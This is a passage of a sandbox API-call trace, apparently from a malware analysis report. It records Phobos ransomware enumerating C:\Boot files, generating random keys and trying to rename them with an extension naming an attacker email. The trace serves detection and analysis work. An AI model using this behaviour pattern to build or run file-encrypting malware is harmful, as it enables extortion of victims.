lpFileSize=0x2c9fbf0*=89168) returned 1 [0132.707] CloseHandle (hObject=0x11c) returned 1 [0132.707] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui")) returned 0x20 [0132.707] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.707] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.707] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.707] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.707] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=87616) returned 1 [0132.707] CloseHandle (hObject=0x11c) returned 1 [0132.707] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui")) returned 0x20 [0132.707] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.707] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.708] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.708] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.708] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=91712) returned 1 [0132.708] CloseHandle (hObject=0x11c) returned 1 [0132.708] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui")) returned 0x20 [0132.708] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.708] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.708] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.708] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.708] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=94800) returned 1 [0132.708] CloseHandle (hObject=0x11c) returned 1 [0132.709] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui")) returned 0x20 [0132.709] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.709] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.709] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.709] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.709] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=85056) returned 1 [0132.709] CloseHandle (hObject=0x11c) returned 1 [0132.709] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui")) returned 0x20 [0132.709] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.709] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.709] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.710] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.711] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=43600) returned 1 [0132.711] CloseHandle (hObject=0x11c) returned 1 [0132.711] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui")) returned 0x20 [0132.711] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\en-us\\memtest.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.711] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.711] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.711] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.711] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=90192) returned 1 [0132.711] CloseHandle (hObject=0x11c) returned 1 [0132.711] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui")) returned 0x20 [0132.711] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.712] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.712] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.712] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.712] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=89152) returned 1 [0132.712] CloseHandle (hObject=0x11c) returned 1 [0132.712] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui")) returned 0x20 [0132.712] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.712] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.712] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.712] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.713] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3694080) returned 1 [0132.713] CloseHandle (hObject=0x11c) returned 1 [0132.713] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf")) returned 0x20 [0132.713] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0 [0132.713] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf")) returned 0 [0132.713] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.713] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.713] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3876772) returned 1 [0132.713] CloseHandle (hObject=0x11c) returned 1 [0132.713] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf")) returned 0x20 [0132.713] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0 [0132.714] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf")) returned 0 [0132.714] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.714] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.714] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1984228) returned 1 [0132.714] CloseHandle (hObject=0x11c) returned 1 [0132.714] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf")) returned 0x20 [0132.714] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0 [0132.714] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf")) returned 0 [0132.714] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.714] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.715] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2371360) returned 1 [0132.715] CloseHandle (hObject=0x11c) returned 1 [0132.715] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf")) returned 0x20 [0132.715] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0 [0132.715] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf")) returned 0 [0132.715] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.715] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.715] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=47452) returned 1 [0132.715] CloseHandle (hObject=0x11c) returned 1 [0132.715] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf")) returned 0x20 [0132.715] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.715] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.715] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.716] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.716] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=93248) returned 1 [0132.716] CloseHandle (hObject=0x11c) returned 1 [0132.716] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui")) returned 0x20 [0132.716] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.716] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.716] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.716] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.716] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=90688) returned 1 [0132.716] CloseHandle (hObject=0x11c) returned 1 [0132.716] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui")) returned 0x20 [0132.717] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.717] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.717] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.717] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.717] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=90704) returned 1 [0132.717] CloseHandle (hObject=0x11c) returned 1 [0132.717] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui")) returned 0x20 [0132.717] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.717] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.717] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.718] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.718] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=76352) returned 1 [0132.718] CloseHandle (hObject=0x11c) returned 1 [0132.718] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui")) returned 0x20 [0132.718] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.718] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.718] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.718] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.718] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=75344) returned 1 [0132.718] CloseHandle (hObject=0x11c) returned 1 [0132.718] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui")) returned 0x20 [0132.718] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.718] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.719] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0132.719] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0132.719] GetFileSizeEx (in: hFile=0x11c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=485760) returned 1 [0132.719] CloseHandle (hObject=0x11c) returned 1 [0132.719] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe")) returned 0x20 [0132.719] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\memtest.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\memtest.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.719] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.719] CryptGenRandom (in: hProv=0xa24cf8, 